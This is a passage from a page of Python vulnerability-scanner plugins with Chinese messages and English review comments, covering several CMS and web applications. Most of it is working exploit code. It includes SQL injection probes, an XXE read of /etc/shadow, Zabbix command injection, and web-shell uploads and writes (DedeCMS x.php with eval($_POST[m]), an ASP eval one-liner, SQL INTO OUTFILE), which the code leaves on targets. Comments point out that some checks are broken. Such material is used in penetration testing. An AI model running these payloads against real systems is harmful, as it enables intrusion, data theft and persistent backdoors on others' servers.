ionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F"
         _response = requests.post(url, data=payload, headers=headers)
         _response1 = requests.post(url, data=payload1, headers=headers)
         # Any byte-level difference counts (dynamic content such as
         # timestamps or tokens in the page would also trigger this).
         if _response.text != _response1.text:
             self.output.report(
                 self.vuln,
                 '发现{target}存在{name}漏洞'.format(target=self.target,
                                               name=self.vuln.name))
     except Exception as e:
         self.output.info('执行异常:{}'.format(e))
예제 #13
    def verify(self) -> None:
        """Time-based SQL injection probe on ``/cpapi/qxtapi.php`` (XML body).

        Posts an XML document whose ``RecvTime`` element contains
        ``0'|sleep(0)#`` (baseline) and then ``0'|sleep(5)#``, with a 3 s
        request timeout on each, and reports when the second request took
        more than 4 s longer than the first.  Exceptions are logged and
        swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # X-FORWARDED-FOR is a client-supplied (spoofable) header; the
            # fixed IP here is whatever the author chose, not the scanner's.
            headers = {
                'User-Agent':
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',
                'X-FORWARDED-FOR': '221.179.180.156'
            }
            # Unused in this block.
            payloads = list('@abcdefghijklmnopqrstuvwxyz.0123456789')
            url = self.target + '/cpapi/qxtapi.php'
            data_sleep = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(5)#</RecvTime></Message></Body></aaaa>"
            data_normal = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(0)#</RecvTime></Message></Body></aaaa>"
            time_start = time.time()
            requests.post(url, data=data_normal, headers=headers, timeout=3)
            time_end_normal = time.time()
            # NOTE(review): timeout=3 is shorter than the 5 s sleep the
            # payload requests, so a genuinely delayed response raises a
            # timeout exception here (caught below) before the > 4 check
            # can be reached — confirm the intended relationship between
            # the two values.
            requests.post(url, data=data_sleep, headers=headers, timeout=3)
            time_end_sleep = time.time()

            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 4:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #14
    def verify(self) -> None:
        """Time-based SQL injection probe on ``/cacti/graphs_new.php``.

        Posts a baseline ``cg_g`` value and then one whose subquery calls
        ``sleep(5)``, reporting when the second request took more than 4 s
        longer than the first.  The ``__csrf_magic`` token in both bodies is
        a fixed value tied to one session.  Exceptions are logged and
        swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            payload = '/cacti/graphs_new.php'
            url = self.target + payload
            data_sleep = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save"
            data_normal = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select md5(c))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save"
            time_start = time.time()
            # Body passed positionally (second positional arg of
            # requests.post is `data`); no timeout on either request.
            requests.post(url, data_normal)
            time_end_normal = time.time()
            requests.post(url, data_sleep)
            time_end_sleep = time.time()

            # delayed duration minus baseline duration, single sample.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 4:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞;\n漏洞地址为{url};具体请查看漏洞详情'.format(
                        target=self.target, name=self.vuln.name, url=url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #15
    def verify(self) -> None:
        """Time-based SQL injection probe on a webmail ``contact-del`` action.

        Posts ``contact_ids=-1) or 1%23`` as the baseline and
        ``contact_ids=-1) or sleep(5)%23`` as the delayed request, reporting
        when the second took more than 4 s longer.  NOTE(review): the action
        name suggests a delete operation; an always-true ``or 1`` clause on
        such a statement could affect real rows, so confirm the endpoint's
        behaviour before running this outside a lab.  Exceptions are logged
        and swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # The payload path depends on the actual deployment.
            payload = '/webmail/client/pab/index.php?module=operate&action=contact-del'
            data_sleep = "contact_ids=-1) or sleep(5)%23"
            data_normal = "contact_ids=-1) or 1%23"
            url = self.target + payload
            time_start = time.time()
            # No timeout on either request.
            requests.post(url, data=data_normal)
            time_end_normal = time.time()
            requests.post(url, data=data_sleep)
            time_end_sleep = time.time()

            # delayed duration minus baseline duration, single sample.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 4:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #16
    def verify(self) -> None:
        """Time-based SQL injection probe on the FormMakerSQLMapping AJAX action.

        Posts two ``name`` values against ``admin-ajax.php`` and reports
        when the second request took at least ``timeout`` seconds longer
        than the first.  Note that ``timeout`` here is the SLEEP duration
        and threshold, not a request timeout — neither request has one.
        Exceptions are logged and swallowed.  ``self.target`` is rewritten
        in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            url = self.target + \
                '/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct'
            timeout = 5
            start_time = time.time()

            # First request: SLEEP(timeout) i.e. SLEEP(5).
            payload = {
                'name': "wp_users WHERE 42=42 AND SLEEP({})--;".format(timeout)
            }
            _response = requests.post(url, data=payload)

            end_time1 = time.time()

            # NOTE(review): the second request also carries SLEEP(5), so on
            # a vulnerable target both requests are delayed equally and the
            # difference below stays near zero — the other timing checks on
            # this page use a non-sleeping baseline; confirm what was meant.
            payload1 = {'name': "wp_users WHERE 42=42 AND SLEEP(5)--;"}
            _response = requests.post(url, data=payload1)
            end_time2 = time.time()

            # (second duration) - (first duration) >= 5
            if (end_time2 - end_time1) - (end_time1 - start_time) >= timeout:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))
        except Exception as e:
            self.output.info('执行异常:{}'.format(e))
예제 #17
    def exploit(self) -> None:
        """Exploit via ``/plus/download.php`` array parameters, then check ``/plus/x.php``.

        Posts ``arrs1[]``/``arrs2[]`` numeric arrays (they decode as ASCII
        codes: ``arrs1`` spells ``cfg_dbprefix`` and ``arrs2`` begins
        ``mytag` SET``), requests ``/plus/mytag_js.php?aid=1`` to trigger
        it, and then fetches ``/plus/x.php``.  Per the comment below this
        leaves a web shell at ``/plus/x.php`` — a persistent change the
        report message asks the operator to remove.  Success is judged only
        on an HTTP 200 from ``/plus/x.php``, which is weak evidence (any
        existing page at that path would match).  Exceptions are logged and
        swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Generates x.php in the plus directory, password m
            # http://127.0.0.1/plus/x.php
            payload = "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
            url = self.target + payload

            # Defender note: a single request to download.php with dozens of
            # arrs1[]/arrs2[] parameters is the artefact to alert on.
            requests.post(url)
            requests.get(self.target + '/plus/mytag_js.php?aid=1')

            url1 = self.target + '/plus/x.php'
            r = requests.get(url1)

            # Status-only check; the body is not inspected.
            if r.status_code == 200:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,,已上传webshell地址:{url}密码为m,请及时删除。'.
                    format(target=self.target, name=self.vuln.name, url=url1))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #18
    def exploit(self) -> None:
        """Template-injection exploit via ``index.php?m=vod-search``.

        Posts ``wd={if-A:assert($_POST[c])}{endif-A}`` to the search
        endpoint, then posts ``c=phpinfo()`` to the same endpoint with the
        injection repeated in the query string, and reports when the body
        looks like ``phpinfo()`` output.  The report message describes the
        result as an uploaded web shell with password ``c`` and asks the
        operator to delete it.  Exceptions are logged and swallowed.
        ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            payload = "/index.php?m=vod-search"
            data = "wd={if-A:assert($_POST[c])}{endif-A}"
            url = self.target + payload
            requests.post(url, data=data)
            # Same injection, now in the query string; `c` carries the code
            # assert() will evaluate.
            verify_url = url + '&wd={if-A:assert($_POST[c])}{endif-A}'
            verify_data = 'c=phpinfo()'
            r = requests.post(verify_url, data=verify_data)

            # NOTE(review): the marker is spelled 'PHP Verison' here but
            # 'PHP Version' in the other phpinfo check on this page —
            # confirm which spelling is intended.
            if 'PHP Verison' in r.text and 'System' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.
                    format(target=self.target,
                           name=self.vuln.name,
                           url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for a Zabbix JSON-RPC endpoint (``api_jsonrpc.php``).

        Logs in with the hard-coded credentials below, prompts the operator
        for a command on stdin, sends a ``script.update`` call that stores
        that command in script id 1, builds (but never sends) a
        ``script.execute`` call, and then reports the vulnerability
        unconditionally — no response is inspected before reporting.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Blocks on stdin for the prompt. Exceptions
        are logged through ``self.output.info``; the method never raises.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            url = self.target + '/api_jsonrpc.php'
            # Placeholder credentials and host id: the literal '******' values
            # are sent as-is, so the login only succeeds if the target accepts them.
            login = '******'  # Zabbix login
            password = '******'  # Zabbix password
            hostid = '10084'  # Zabbix hostid
            payload = {
                "jsonrpc": "2.0",
                "method": "user.login",
                "params": {
                    'user': ""+login+"",
                    'password': ""+password+"",
                },
                "auth": None,
                "id": 0,
            }
            headers = {
                'content-type': 'application/json',
            }
            auth = requests.post(url, data=json.dumps(
                payload), headers=(headers))
            try:
                auth = auth.json()
            except:
                # Non-JSON reply: give up silently (nothing is logged or reported).
                return
            # NOTE(review): eval(input(...)) evaluates whatever the operator types
            # as a Python expression on the scanner host before it is used as the
            # command string: plain text raises NameError/SyntaxError (caught by
            # the outer except) and any expression typed is executed locally.
            # This reads like a Python 2 raw_input() port; presumably input()
            # alone was intended — confirm.
            cmd = eval(input('\033[41m[zabbix_cmd]>>: \033[0m '))

        # update
            # auth['result'] raises KeyError when the login reply carries no
            # 'result' key (e.g. a rejected login); that lands in the outer except.
            payload = {
                "jsonrpc": "2.0",
                "method": "script.update",
                "params": {
                    "scriptid": "1",
                    "command": ""+cmd+""
                },
                "auth": auth['result'],
                "id": 0,
            }

            # Overwrites the command stored in script id 1 on the target.
            # The response (cmd_upd) is kept but never inspected.
            cmd_upd = requests.post(
                url, data=json.dumps(payload), headers=(headers))
        # execute
            # Built but never sent: no request follows this payload, and the
            # report below fires regardless of what the target answered.
            payload = {
                "jsonrpc": "2.0",
                "method": "script.execute",
                "params": {
                    "scriptid": "1",
                    "hostid": ""+hostid+""
                },
                "auth": auth['result'],
                "id": 0,
            }
            # Unconditional report: reaching this line only proves that login
            # returned JSON with a 'result' key and that script.update did not raise.
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                target=self.target, name=self.vuln.name))
        except Exception as e:
            self.output.info('执行异常:{}'.format(e))
    def verify(self) -> None:
        """Verify check for gxlcms: phpinfo disclosure plus SQL ``INTO OUTFILE``.

        Step 1 reads ``DOCUMENT_ROOT`` from the admin phpinfo page. Step 2
        posts a ``SELECT ... INTO OUTFILE`` statement to the admin ``upsql``
        action that writes ``cscan.php`` under that path. Step 3 requests the
        written file and reports the vulnerability when the response contains
        the MD5 of ``'c'``, which the written page echoes.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. On success a file is left on the target and,
        unlike the other checks in this file, the report message does not
        tell the operator to remove it. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Get the site's absolute filesystem path from the phpinfo page.
            document_root = ''
            payload = '/gxlcms/index.php?s=Admin-Index-phpinfo'
            url = self.target + payload
            r = requests.get(url)
            p = re.compile(r'DOCUMENT_ROOT\'\]</td><td class=\"v\">(.+)</td>')
            # findall runs twice here. On no match document_root stays '' and the
            # OUTFILE path below degrades to '/gxlcms/cscan.php' at filesystem root.
            if p.findall(r.text):
                document_root = p.findall(r.text)[0]
                self.output.info('获取到网站绝对路径{}'.format(document_root))

            # Write the file via SQL. The hash= value is a fixed literal; whether
            # the target still accepts it depends on the deployment — unverified.
            payload = '/gxlcms/index.php?s=Admin-Data-upsql'
            url = self.target + payload
            data = "sql=select '<?php phpinfo();echo md5(c)?>' INTO OUTFILE '{}/gxlcms/cscan.php';&submit=%E6%8F%90+%E4%BA%A4&hash=ab2af3933aa472eba3a25e8d69852e55".format(
                document_root)
            # Write response is not inspected; success is judged by fetching the file.
            requests.post(url, data=data)
            verify_url = self.target + '/gxlcms/cscan.php'
            r = requests.get(verify_url)

            # Marker is md5('c'); its presence indicates the written file was
            # served and executed as PHP.
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target,
                        name=self.vuln.name,
                        url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self) -> None:
        """Exploit check for ``/Comm/UploadFile/webUpload.aspx``.

        Posts a hand-built multipart body naming a ``.cer`` file whose content
        is an ASP ``eval request("c")`` one-liner, with ``FilePath`` set to
        ``/../web/``. Success is judged solely by an HTTP 200 on the upload
        response; the response body (``res``) is read but never used and the
        reported URL is never requested.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            vun_url = arg + "/Comm/UploadFile/webUpload.aspx?AttId=9d37b73795649038.cer&FilePath=/../web/"
            # Hand-rolled multipart body. As a triple-quoted literal every line
            # carries 16 leading spaces, and no Content-Type header with the
            # boundary is set on the request, so whether the server parses this
            # as multipart is uncertain.
            data = '''
                ------WebKitFormBoundarySi7aFG5fhvI14Vbv
                Content-Disposition: form-data; name="__VIEWSTATE"
                /wEPDwUJLTkxNTA4NDgxZGT4FQnTj63sW6bItFI88C2Fes3jcRPos/LRQn4yOHqiRw==
                ------WebKitFormBoundarySi7aFG5fhvI14Vbv
                Content-Disposition: form-data; name="fa"; filename="9d37b73795649038.cer"
                Content-Type: application/x-x509-ca-cert
                <%eval request("c")%>
                ------WebKitFormBoundarySi7aFG5fhvI14Vbv--
                '''
            r = requests.post(vun_url, data=data)
            res = r.text  # unused
            # No separator is inserted: the URL is only well-formed when
            # self.target already ends with '/' (i.e. base_path is empty).
            verify_url = arg + "9d37b73795649038.cer"
            # NOTE(review): any 200 response (an error page included) is reported
            # as a successful upload — a false-positive risk, since verify_url is
            # never fetched to confirm the file exists.
            if r.status_code == 200:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞;\n已上传webshell地址:{url}密码为c,请及时删除。'.
                    format(target=self.target,
                           name=self.vuln.name,
                           url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for a JSP upload handler (``lwUpLoad_action.jsp``).

        Uploads ``v.jsp`` as multipart field ``theFile``; the JSP prints its
        own real path and the literal ``payload=true``. The check then fetches
        ``/lwUpLoadTemp/null.jsp`` and reports the vulnerability when that
        marker appears in the response.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Nothing in this method removes the uploaded
        file. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            payload = "/lwUpLoadTemp/null.jsp"
            verify_url = '{target}'.format(target=self.target)+payload
            target_url = '{target}'.format(
                target=self.target)+"/lwUpLoad_action.jsp"
            # Uploaded content: prints the file's real path, then the marker
            # 'payload=true' that the check below looks for.
            file_v_jsp = '''<%@ page import="java.util.*,java.io.*" %>
                <%@ page import="java.io.*"%>
                <%
                String path=application.getRealPath(request.getRequestURI());
                File d=new File(path);
                out.println(path);
                %>
                <% out.println("payload=true");%>
            '''
            files = {'theFile': ('v.jsp', file_v_jsp, 'text/plain')}
            # Upload: requests builds the multipart body here. The response is
            # overwritten below without being inspected.
            response = requests.post(target_url, files=files)  # upload

            # Verify: the file was sent as v.jsp but null.jsp is fetched —
            # presumably the handler renames uploads; confirm against the target.
            response = requests.get(verify_url)  # verify
            content = response.text
            if 'payload=true' in content:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for XXE in the XML body accepted by ``/api/login``.

        Posts a document whose DTD declares an external entity pointing at
        ``/etc/shadow`` and reports the vulnerability when the response is a
        200 whose text starts with a ``root:`` record matching the regex
        below. The entity ``xxe`` is declared but never referenced
        (``&xxe;`` does not appear in the body).

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            filename = '/etc/shadow'
            # Adjacent literals are joined into one string. Note the XML
            # declaration appears twice, and the DTD-declared entity is never
            # used in <Request>.
            payload = r'<?xml version="1.0" encoding="ISO-8859-1"?>'\
                '<?xml version="1.0" encoding="ISO-8859-1"?>'\
                '<!DOCTYPE foo ['\
                '<!ELEMENT foo ANY >'\
                '<!ENTITY xxe SYSTEM "file://{file}" >]>' \
                '<Request>'\
                '<Username>root</Username>'\
                '<Password>root</Password>'\
                '</Request>'.format(file=filename)

            expurl = arg + '/api/login'
            # Inner try duplicates the outer handler; the outer except only
            # covers the code above this point.
            try:
                response = requests.post(expurl, data=payload, timeout=50)
                # re.match anchors at the start of the body, so file content
                # embedded later in a page is not detected. NOTE(review): the
                # pattern has the 'root:x:0:0:' shape of /etc/passwd; whether a
                # shadow line satisfies it depends on its field values — confirm.
                if re.match('root:.+?:0:0:.+?:.+?:.+?',
                            response.text) and response.status_code == 200:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))
            except Exception as e:
                self.output.info('执行异常{}'.format(e))
        except Exception as e:
            self.output.info('执行异常{}'.format(e))
 def verify(self) -> None:
     """Verify check for the CMSimple ``editusertag.php`` admin page.

     Posts a user-tag definition whose ``code`` is ``passthru('dir')`` with
     ``run=1``, authenticating with the operator-supplied ``cookies`` option,
     and reports the vulnerability when the response contains the fixed
     success fragment below.

     Reads ``self.target``, ``self.vuln`` and the ``base_path`` / ``cookies``
     options; rebinds ``self.target``. Exceptions are logged, never raised.
     """
     # Rebase the target onto base_path (mutates self.target; not idempotent).
     self.target = self.target.rstrip('/') + '/' + (
         self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
         vul_url = self.target + payload
         # Static headers. _sk_ is a fixed literal (a per-session token on a
         # real install, presumably) and Content-Length is hard-coded to 115
         # rather than derived from the body.
         vul_header = {
             "User-Agent":
             "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
             "Accept": "*/*",
             "Accept-Language": "en-US,en;q=0.5",
             "Accept-Encoding": "gzip, deflate",
             "Content-Type":
             "application/x-www-form-urlencoded; charset=UTF-8",
             "X-Requested-With": "XMLHttpRequest",
             "Content-Length": "115",
             "Cookie": self.get_option("cookies"),
             "Connection": "close",
             "Pragma": "no-cache",
             "Cache-Control": "no-cache"
         }
         data = '''_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1'''
         # NOTE(review): requests.post() accepts `headers=`, not `header=`; as
         # written this raises TypeError before any request is sent, and the
         # except below logs it as 执行异常 — so this check never reports.
         _response = requests.post(vul_url, data=data, header=vul_header)
         # Success fragment ends mid-string (unbalanced quote); it is matched
         # literally.
         if '''{"response":"Success","details":"}''' in _response.text:
             self.output.report(
                 self.vuln,
                 '发现{target}存在{name}漏洞'.format(target=self.target,
                                               name=self.vuln.name))
     except Exception as e:
         self.output.info('执行异常:{}'.format(e))
    def verify(self) -> None:
        """Verify check for error-based SQL injection via ``my.php?item=buddylist[...]``.

        The injected ``count(*) ... group by floor(rand(0)*2)`` subquery
        concatenates a ``cdb_members`` username with ``md5(c)``, so that value
        is expected to surface in a database error message; the vulnerability
        is reported when the MD5 of ``'c'`` appears in the response.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. The request is sent with no cookies (see
        below). Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register a user first.
            # Obtain cookies.
            # The triple-quoted block below is a bare string expression, not
            # code: cookies stays empty and the request goes out unauthenticated.
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = "/my.php?item=buddylist[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,md5(c),0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1"
            # formhash is a fixed literal; a real install presumably issues a
            # per-session value — unverified.
            data = "formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            url = self.target + payload
            r = requests.post(url, cookies=cookies, data=data)

            # Marker is md5('c').
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for reflected/stored XSS in the ``/guest/index.html`` form.

        Posts a guestbook entry whose ``title`` is an ``<svg/onload=...>`` tag
        using the ``cookies`` option as the session, then reports the
        vulnerability when the response contains the script fragment below.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` / ``cookies``
        options; rebinds ``self.target``. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Logged-in user session comes from the cookies option.
            self.output.info('开始对网站进行跨站脚本漏洞检查...')
            payload = '/guest/index.html'
            headers = {
                'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
                'Cookie': '%s' % self.get_option('cookies')
            }
            # title is the URL-encoded form of <svg/onload=alert('cscan')>.
            data = "title=%3Csvg%2Fonload%3Dalert%28%27cscan%27%29%3E&name=test&email=test%40test.t&content=test"
            url = self.target + payload
            self.output.info('对网站/guest/index.html页面进行跨站请求验证...')
            r = requests.post(url, headers=headers, data=data)

            # NOTE(review): the submitted payload is an <svg/onload=...> tag, but
            # the check looks for a <script>alert('cscan')</script> fragment that
            # this request never sends, so the match does not follow from the
            # payload being reflected — confirm what is actually being detected.
            if "<script>alert('cscan')</script>" in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for stored XSS through the admin article insert action.

        Posts an article whose ``title`` is an ``<img src=x onerror=...>`` tag
        using the ``cookie`` option as the session, then fetches the admin
        article list and reports the vulnerability when the tag is echoed
        unescaped inside a table cell.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` / ``cookie``
        options; rebinds ``self.target``. On success an article containing the
        payload remains in the target's data. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
